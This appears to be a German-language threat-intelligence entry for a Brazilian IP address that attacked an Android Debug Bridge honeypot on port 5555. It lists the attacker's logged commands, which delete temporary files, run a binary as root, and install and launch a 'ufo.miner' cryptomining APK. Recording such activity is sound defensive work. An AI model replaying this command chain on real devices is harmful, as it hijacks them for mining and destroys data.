TROYANOSYVIRUS
Aktive BedrohungNIEDRIG

189.7.227.64

Herkunftsland🇧🇷 Brasil
Erste Erkennung18.3.2026
Letzte Aktivitat18.3.2026
ISPClaro NXT Telecomunicacoes Ltda
🎯
38
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
4
Malware

Geolokalisierung

Land
🇧🇷 Brasil
Stadt
Cruz Alta
ASN
AS28573
ISP
Claro NXT Telecomunicacoes Ltda

Angriffsarten

adb_honeypot

Angegriffene Ports

5555

Zugehorige Malware

Ausgefuhrte Befehle

$rm -rf /data/local/tmp/*4x
$ps | grep xig2x
$/data/local/tmp/nohup su -c /data/local/tmp/trinity2x
$ps | grep trinity2x
$rm /data/local/tmp/ufo.apk2x
$pm install /data/local/tmp/ufo.apk2x
$chmod 0755 /data/local/tmp/nohup2x
$chmod 0755 /data/local/tmp/trinity2x
$pm path com.ufo.miner2x
$am start -n com.ufo.miner/com.example.test.MainActivity2x

Risikobewertung

30
/100
NiedrigMittelHochKritisch